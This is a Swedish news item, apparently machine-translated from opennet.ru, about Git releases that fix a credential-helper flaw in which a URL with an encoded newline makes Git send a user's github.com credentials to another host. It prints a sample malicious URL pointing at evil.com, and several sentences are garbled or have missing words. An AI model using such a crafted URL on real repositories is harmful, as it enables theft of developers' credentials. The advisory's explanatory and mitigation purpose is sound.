korrigerande utgåvor av det distribuerade källkontrollsystemet Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 och 2.17.4, i som eliminerade () i hanteraren"", vilket gör att referenser skickas till fel värd när en git-klient kommer åt ett arkiv med en speciellt formaterad URL som innehåller ett nyradstecken. Sårbarheten kan användas för att ordna så att referenser från en annan värd skickas till en server som kontrolleras av angriparen.
När du anger en URL som "https://evil.com?%0ahost=github.com/", kommer autentiseringshanteraren vid anslutning till värden evil.com att skicka autentiseringsparametrarna som specificeras för github.com. Problemet uppstår när man utför operationer som "git clone", inklusive bearbetning av URL:er för undermoduler (till exempel "git submodule update" kommer automatiskt att bearbeta URL:erna som anges i .gitmodules-filen från förvaret). Sårbarheten är farligast i situationer där en utvecklare klonar ett arkiv utan att se URL:en, till exempel när man arbetar med undermoduler, eller i system som utför automatiska åtgärder, till exempel i paketbyggda skript.
För att blockera sårbarheter i nya versioner skickar ett nyradstecken i alla värden som överförs genom referensutbytesprotokollet. För distributioner kan du spåra utgivningen av paketuppdateringar på sidorna , , , , , , .
Som en lösning för att blockera problemet Använd inte credential.helper när du kommer åt offentliga arkiv och använd inte "git clone" i läget "--recurse-submodules" med omarkerade arkiv. För att helt inaktivera credential.helper-hanteraren, vilket gör det och hämta lösenord från , skyddad eller en fil med lösenord kan du använda kommandona:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Källa: opennet.ru